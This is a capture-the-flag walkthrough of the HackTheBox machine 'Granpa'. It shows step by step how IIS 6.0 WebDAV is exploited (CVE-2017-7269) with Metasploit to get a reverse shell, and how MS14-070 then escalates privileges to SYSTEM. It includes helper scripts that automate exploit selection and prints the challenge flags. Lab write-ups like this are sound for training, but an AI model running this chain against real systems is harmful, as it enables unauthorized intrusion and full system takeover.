Granpa - Hackthebox

  • This box is very similar to the previous one, Granny, so I followed the same flow.
# nmap -sV -sT -sC -Pn 10.10.10.14
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
| http-ntlm-info: 
|   Target_Name: GRANPA
|   NetBIOS_Domain_Name: GRANPA
|   NetBIOS_Computer_Name: GRANPA
|   DNS_Domain_Name: granpa
|   DNS_Computer_Name: granpa
|_  Product_Version: 5.2.3790
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan: 
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
|   Server Date: Thu, 03 Jun 2021 03:35:30 GMT
|   Server Type: Microsoft-IIS/6.0
|   WebDAV type: Unknown
|_  Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
  • Confirmed that WebDAV is enabled on IIS 6.0. Note the difference between the two nmap lists: Allowed Methods is what the probed resource accepts, while Public Options is what the server as a whole advertises, and the latter includes write methods (PUT, DELETE, MOVE, MKCOL, PROPPATCH) on top of PROPFIND/SEARCH.
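The triage nmap does here (collect Server/Allow/Public, flag risky methods, spot the IIS 6.0 + WebDAV combination) is easy to reproduce on a raw OPTIONS response, which is handy when you only have a captured reply or a proxy log rather than a live host. The following is an added example, not code from the original post or from nmap; the two responses it parses are constructed to resemble the headers nmap summarised above and are not captures from the box.

```python
"""Triage a WebDAV OPTIONS response: pull Server, Allow and Public headers,
flag risky/write methods and note the IIS 6.0 + WebDAV combination.
Added example; the sample responses below are constructed, not captured."""
from typing import Dict, List

# Methods that let a client enumerate, lock or modify content over WebDAV.
RISKY_METHODS = {
    "PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPFIND", "PROPPATCH",
    "LOCK", "UNLOCK", "SEARCH", "TRACE",
}
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "MKCOL", "PROPPATCH"}

# Constructed sample shaped like the nmap summary for this box.
IIS6_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, "
    "MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK\r\n"
    "DAV: 1, 2\r\n"
    "MS-Author-Via: DAV\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)

# Constructed control case: a plain web server with no DAV headers at all.
PLAIN_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.41\r\n"
    "Allow: GET, HEAD, POST, OPTIONS\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)


def parse_headers(raw: str) -> Dict[str, str]:
    """Return response headers keyed by lower-cased name (status line dropped)."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers: Dict[str, str] = {}
    for line in head.split("\r\n")[1:]:
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        headers[name.strip().lower()] = value.strip()
    return headers


def method_list(value: str) -> List[str]:
    """Split a comma-separated method header into upper-cased tokens."""
    return [m.strip().upper() for m in value.split(",") if m.strip()]


def triage_webdav(raw: str) -> Dict[str, object]:
    """Summarise what an OPTIONS response tells an attacker about WebDAV."""
    h = parse_headers(raw)
    allowed = set(method_list(h.get("allow", "")))
    public = set(method_list(h.get("public", "")))
    server = h.get("server", "")
    # DAV/MS-Author-Via headers, or PROPFIND being advertised, mean WebDAV is on.
    dav_enabled = "dav" in h or "ms-author-via" in h or "PROPFIND" in (allowed | public)
    return {
        "server": server,
        "webdav": dav_enabled,
        "iis6_webdav": server.startswith("Microsoft-IIS/6.0") and dav_enabled,
        # Every risky method advertised anywhere (resource or server-wide).
        "risky": sorted((allowed | public) & RISKY_METHODS),
        # Write methods the server advertises but this resource does not allow:
        # worth retrying against other paths (upload directories, virtual dirs).
        "write_public_only": sorted((public - allowed) & WRITE_METHODS),
    }


if __name__ == "__main__":
    for name, resp in (("iis6", IIS6_RESPONSE), ("plain", PLAIN_RESPONSE)):
        print(name, triage_webdav(resp))
```

The `write_public_only` bucket is the practical takeaway: a server-wide `Public` list that carries PUT/MOVE/MKCOL while the probed path's `Allow` does not means those methods are worth retrying on other paths before reaching for a memory-corruption exploit.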
# msfconsole
msf6 > search iis 6.0 webdav
Matching Modules
================

   #  Name                                                 Disclosure Date  Rank    Check  Description
   -  ----                                                 ---------------  ----    -----  -----------
   0  exploit/windows/iis/iis_webdav_scstoragepathfromurl  2017-03-26       manual  Yes    Microsoft IIS WebDav ScStoragePathFromUrl Overflow
  • Searching for IIS 6.0 WebDAV vulnerabilities turned up the module above: the ScStoragePathFromUrl buffer overflow (CVE-2017-7269), reached through a crafted PROPFIND request against IIS 6.0 on Windows Server 2003, which matches the Product_Version 5.2.3790 nmap reported. Its Rank is manual because it brute-forces a working path length against the target rather than firing once.
msf6 > use 0
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhosts 10.10.10.14
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set lhost 10.10.14.16
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > exploit
  • Set the target (rhosts) and the listener address (lhost), then ran the exploit.
[*] Started reverse TCP handler on 10.10.14.16:4444 
[*] Trying path length 3 to 60 ...
[*] Sending stage (175174 bytes) to 10.10.10.14
[*] Meterpreter session 1 opened (10.10.14.16:4444 -> 10.10.10.14:1031) at 2021-06-02 23:42:16 -0400
meterpreter > shell
Process 2308 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service
  • The shell runs as nt authority\network service, the identity of the IIS 6.0 worker process (note the c:\windows\system32\inetsrv working directory).
C:\Documents and Settings>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 246C-D7FE

 Directory of C:\Documents and Settings

04/12/2017  05:32 PM    <DIR>          .
04/12/2017  05:32 PM    <DIR>          ..
04/12/2017  05:12 PM    <DIR>          Administrator
04/12/2017  05:03 PM    <DIR>          All Users
04/12/2017  05:32 PM    <DIR>          Harry
               0 File(s)              0 bytes
               5 Dir(s)  18,092,687,360 bytes free

C:\Documents and Settings>cd Harry 
cd Harry
Access is denied.
  • Access to Harry's directory, where the user flag is expected, was denied, and the same goes for Administrator. Wondering whether there was a higher privilege than this account, I searched for "nt authority network service escalate privileges" and concluded that nt authority\system is the privilege to aim for.
  • I then used the local exploit suggester to check whether escalation to SYSTEM was possible.
msf6 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > search local suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester

msf6 post(multi/recon/local_exploit_suggester) > set session 2
session => 2
msf6 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 37 exploit checks are being tried...
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
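The suggester output mixes two confidence levels: "The target appears to be vulnerable." is a positive check, while "The service is running, but could not be validated." only means the vulnerable component is present. Ordering candidates by that distinction, and turning the confirmed ones into an msfconsole resource script, is a small step worth automating. The following is an added example, not the post's own code or part of Metasploit; the sample transcript is constructed from the lines shown above, and the lhost/session values passed to the script builder are assumptions.

```python
"""Rank local_exploit_suggester output and emit an msfconsole resource script
that tries the confirmed modules first. Added example; SAMPLE_OUTPUT is a
constructed transcript modelled on the post's lines."""
import re
from typing import Dict, List, Tuple

VULNERABLE = "The target appears to be vulnerable."
UNVALIDATED = "The service is running, but could not be validated."

# "[+] <host> - <module>: <message>"
LINE_RE = re.compile(
    r"^\[\+\]\s+(?P<host>\S+)\s+-\s+(?P<module>exploit/\S+):\s+(?P<msg>.*)$"
)

# Constructed sample, including the status lines and the RubyGems warning
# that show up in a real msfconsole transcript and must be skipped.
SAMPLE_OUTPUT = """\
[*] 10.10.10.14 - Collecting local exploits for x86/windows...
[*] 10.10.10.14 - 37 exploit checks are being tried...
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.10.14 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.14 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.14 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
"""


def parse_suggester(text: str) -> List[Tuple[str, str, str]]:
    """Return (host, module, message) for every [+] line; ignore the rest."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            hits.append((m["host"], m["module"], m["msg"]))
    return hits


def rank_candidates(text: str) -> Dict[str, List[str]]:
    """Bucket modules by the confidence of the suggester's check message."""
    buckets: Dict[str, List[str]] = {"confirmed": [], "unvalidated": [], "other": []}
    for _host, module, msg in parse_suggester(text):
        if msg == VULNERABLE:
            buckets["confirmed"].append(module)
        elif msg == UNVALIDATED:
            buckets["unvalidated"].append(module)
        else:
            buckets["other"].append(module)
    return buckets


def msf_resource_script(text: str, session: int, lhost: str, lport: int) -> str:
    """Build an msfconsole .rc that runs each confirmed module against SESSION.

    session/lhost/lport are the operator's values (assumed here); each module
    gets its own listener port so a session opened by one attempt does not
    collide with the next handler.
    """
    lines = []
    for i, module in enumerate(rank_candidates(text)["confirmed"]):
        lines += [
            f"use {module}",
            f"set SESSION {session}",
            f"set LHOST {lhost}",
            f"set LPORT {lport + i}",
            "exploit",
        ]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    print(rank_candidates(SAMPLE_OUTPUT))
    print(msf_resource_script(SAMPLE_OUTPUT, session=2, lhost="10.10.14.16", lport=4445))
```

Before loading the script with `msfconsole -r`, run `getuid` in the session you pass as SESSION: as the post shows below, a session whose own token queries return "Access is denied" will fail every local module at its pre-check, and no amount of candidate ranking helps until it has been migrated.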
  • I picked one of the exploits marked as vulnerable for this target and tried it, but got the error below.
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > exploit

[*] Started reverse TCP handler on 10.10.14.16:4445 
[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.
[*] Exploit completed, but no session was created.
  • The error says the module tried getsid and was denied. Going back into the existing session and running getuid showed the real problem.
meterpreter > getuid
[-] stdapi_sys_config_getuid: Operation failed: Access is denied.
  • The session's token was not usable: local exploit modules query the session's own token (getsid/getuid) before they fire, so a Meterpreter session that cannot read its own token fails at that pre-check rather than at the kernel bug. As in Granny, I migrated into a process actually running as NT AUTHORITY\NETWORK SERVICE and ran getuid again, which then worked.
meterpreter > migrate 1828
[*] Migrating from 2328 to 1828...
[*] Migration completed successfully.
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
  • After that, re-running the local exploit (ms14_070_tcpip_ioctl, a tcpip.sys IOCTL elevation-of-privilege flaw fixed in MS14-070, CVE-2014-4076, that affects Windows Server 2003) worked.
msf6 exploit(windows/local/ms14_070_tcpip_ioctl) > exploit

[*] Started reverse TCP handler on 10.10.14.16:4444 
[*] Storing the shellcode in memory...
[*] Triggering the vulnerability...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Sending stage (175174 bytes) to 10.10.10.14
[*] Meterpreter session 3 opened (10.10.14.16:4444 -> 10.10.10.14:1032) at 2021-06-03 00:27:49 -0400
  • The new session runs as SYSTEM, so both Harry's and Administrator's desktops are now readable. The flags are below.
C:\Documents and Settings\Harry\Desktop>type user.txt 
type user.txt
bdff5ec67c3cff017f2bedc146a5d869

C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
9359e905a2c35f861f6a57cecf28bb7b